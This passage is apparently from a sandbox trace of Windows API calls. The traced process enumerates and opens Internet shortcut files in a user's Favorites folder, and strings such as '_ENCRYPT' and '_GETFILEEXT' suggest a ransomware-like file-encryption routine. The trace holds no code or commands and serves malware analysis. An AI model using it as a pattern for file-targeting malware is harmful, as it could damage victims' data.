wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.660] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.672] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.672] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.672] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.672] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.673] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.673] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.673] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.673] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.673] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.673] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.673] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.673] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.673] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 0x90add8 [0180.675] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.675] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.675] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 0x90add8 [0180.675] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.675] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.676] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.676] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.676] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.676] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.676] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.676] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.676] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.676] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.676] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.677] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.677] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.677] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.678] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.678] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.678] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.678] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.678] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.678] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.678] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.678] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.678] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.678] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.678] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 0x90add8 [0180.680] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.680] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 0x90add8 [0180.680] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.681] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.681] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.681] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.682] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.682] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.682] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.682] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.682] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.682] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.682] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.683] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 0x90add8 [0180.684] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.684] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 0x90add8 [0180.685] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.685] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.685] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.685] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.686] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.686] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.686] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.686] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.687] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.687] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.687] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.687] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 0x90add8 [0180.689] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.689] TranslateMessage (lpMsg=0x87f5c4) returned 0 [0180.689] DispatchMessageW (lpMsg=0x87f5c4) returned 0x0 [0180.689] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ec60) returned 1 [0180.690] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0180.690] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0180.690] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0180.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0180.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0180.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0180.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0180.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0180.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0180.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0180.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.690] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 0x90add8 [0180.691] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0180.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0180.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0180.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0180.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0180.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0180.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0180.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0180.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0180.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0180.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0180.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0180.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0180.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0180.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0180.692] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0180.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0180.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0180.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0180.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0180.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90add8 [0180.692] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0180.692] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0180.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0180.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0180.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0180.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0180.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6d90 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0180.693] 